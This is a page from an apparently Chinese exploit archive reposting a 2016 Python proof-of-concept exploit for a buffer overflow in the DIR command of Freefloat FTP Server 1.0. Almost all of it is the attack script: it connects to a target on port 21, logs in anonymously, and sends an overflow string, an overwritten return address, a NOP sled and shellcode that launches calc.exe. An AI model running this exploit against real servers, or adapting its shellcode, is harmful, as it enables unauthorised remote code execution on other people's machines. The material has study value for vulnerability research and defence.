Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow
|
来源:ScrR1pTK1dd13.slammer@gmail.com 作者:ScrR1pTK1dd13 发布时间:2016-11-04
|
|
import socket import sys import os print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = 'A' * 247 eip = '\xF4\xAF\xEA\x75' + '\x90' * 10 #shellcode calc.exe shellcode =( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + "\x57\x78\x01\xc2\x8b\x7a\x20\x01" + "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + "\x45\x81\x3e\x43\x72\x65\x61\x75" + "\xf2\x81\x7e\x08\x6f\x63\x65\x73" + "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + "\xb1\xff\x53\xe2\xfd\x68\x63\x61" + "\x6c\x63\x89\xe2\x52\x52\x53\x53" + "\x53\x53\x53\x53\x52\x53\xff\xd7") remotecode = overflow + eip + shellcode + '\r\n' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASSW hacker@hacker.net\r\n') s.recv(1024) print ''' Successfull Exploitation! ''' message = 'dir ' + remotecode s.send(message) s.recv(1024) s.close
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|